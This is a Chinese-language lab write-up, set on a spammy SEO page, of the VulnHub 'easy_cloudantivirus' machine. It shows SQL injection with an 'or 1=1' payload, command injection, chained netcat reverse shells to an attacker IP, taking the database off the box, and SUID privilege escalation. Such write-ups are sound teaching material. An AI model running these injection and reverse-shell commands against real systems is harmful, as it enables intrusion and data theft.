当前位置: 首页 > news >正文

荣成信用建设官方网站高报师培训机构排名

荣成信用建设官方网站,高报师培训机构排名,广州的房地产网站建设,网站开发工作方向0x00前言 必须安装在virtualbox 攻击机:kali 靶机 easy_cloudantivirus 链接: https://www.vulnhub.com/entry/boredhackerblog-cloud-av,453/ 0x01信息搜集 经过测试发现靶场IP为192.168.56.106 进一部对IP搜集信息 发现8080端口youhttp服务。…

0x00前言

必须安装在virtualbox

攻击机:kali

靶机  easy_cloudantivirus 

链接:

https://www.vulnhub.com/entry/boredhackerblog-cloud-av,453/

0x01信息搜集

经过测试发现靶场IP为192.168.56.106

进一部对IP搜集信息

 发现8080端口youhttp服务。我们去看看有什么东西。

发现有一个页面需要输入邀请码,在这里我们可以尝试一下sql输入。

0x02sql注入 

抓到数据包放到bp的intruder模块中。

方法 尝试一些特殊字符,来看看有没有注入。或者直接包数字也OK

! @ # $ % ^ & * ( ) - _ = + { } [ ] | \ ; : ' " , < > . ? /

 根据返回的长度查看是否有异常。在尝试爆破后网站可能有问题重启一下就OK。

发现sql语句尝试拼接

payload:a" or 1=1--+ 

成功

0x03NC串联

页面上的结果类似 ls 所以可以尝试可能存在命令注入。

尝试一番后。

确认。有命令注入。后面就可以反弹shell。

方法 1. 代码  2.nc

这里为了符合主题,展示新的技术我就用nc了

先尝试一个是否能链接成功。

kali

靶机 payload  file | nc 192.168.56.105 4444  (kali IP )

4444端口会成功 1111我尝试无果很奇怪。

使用提权参数。 

file | nc 192.168.56.105 4444 -e /bin/bash 

使用这个一直不成功,所以引出来新的操作。NC串联。

kali需要监听两个端口。

file | nc 192.168.56.105 4444 | /bin/bash  | nc 192.168.56.105 5555

链接成功

 发现一个sql 使用file查询

0x04查看数据库/发送数据库

 发现一个数据库文件

database.sql

file 可以查看文件

file xxx 发现是sqlite3现在靶机上尝试。没有效果只能把文件发给kali来查看

发送数据库

kali接受成功

查看数据库

发现一些数据库源代码,推测有可能是输入一些密码的sql数据。想到靶机还有一个22端口开放

所以我们可以搜集一些用户名,来进行爆破。

0x05爆破SSH

查看用户并且搜集可以登陆的用户

cat /etc/passwd | grep "bin/bash"

root:x:0:0:root:/root:/bin/bash

cloudav:x:1000:1000:cloudav:/home/cloudav:/bin/bash

scanner:x:1001:1001:scanner,,,:/home/scanner:/bin/bash

弄成字典爆破,爆破无果,继续查看其他文件。

0x06suid提权

SUID(Set User ID)是 Linux 文件权限的一种特殊属性,用于在执行文件时临时授予文件拥有者的权限,而不是执行者本人的权限。SUID 提权是利用了设置了 SUID 位的二进制文件来获取更高权限,通常是提权到 root 权限。

也可以用下面的语句 查看有哪些权限位带有S的文件。

 find / -perm -4000 2>/dev/null 

在查看上层目录文件时发现user权限位有s权限,可能会存在suid提权的方式.

.c是源文件 直接查看.c 

简单查看发现使用时需要参数,尝试命令注入.

kali先监听,然后运行下面的语句

./update_cloudav "a | nc 192.168.56.105 2222 | /bin/bash | nc 192.168.56.105 3333"

用""是吧他们当作一个整体.

 反弹成功

http://www.shuangfujiaoyu.com/news/61835.html

相关文章:

  • 教育网站建设毕业设计说明书页面设计
  • 用asp做网站流程微信小程序开发工具
  • 网站手机自动跳转app拉新平台
  • 宇锋网站建设百度导航
  • 织梦能做视频网站吗关键词排名推广软件
  • 网站一般做多大的一键生成个人网站
  • 马鞍山网站建设百度推广官网网站
  • 建站哪家好联系兴田德润百度竞价排名算法
  • 一个服务器可以做多个网站吗2023年8月份新冠症状
  • 商务网站开发实验蔡甸seo排名公司
  • 北京市工程信息网seo网站运营
  • 做设计_素材网站有哪百度极速版下载安装最新版
  • 又拍网站怎么做楚雄今日头条新闻
  • 天津网站在哪里建设付费推广
  • 广州企业网站模板建站软文代发平台
  • 网站建设人员分工表北京专业seo公司
  • 网站开发需要掌握的知识怎样做网站卖自己的产品
  • 如何个网站做二维码企业建站公司
  • 做公司网站的好处重庆网站到首页排名
  • 大良网站智能推广价格广告优化师工作内容
  • tag 网站备案线下引流推广方法
  • 做网站要学什么软件好广告开户
  • 星巴克网站建设seo服务商排名
  • 自我建设外贸网站海外seo网站推广
  • 建站公司排名 软通如何查看百度搜索指数
  • 网站开发需求说明书模板短视频运营是做什么的
  • org后缀做网站行网页设计制作网站
  • html欧美网站模板汕头网站建设方案推广
  • 公司网站手机版模板绍兴seo排名外包
  • 黄岛开发区做网站的公司百度seo提高排名费用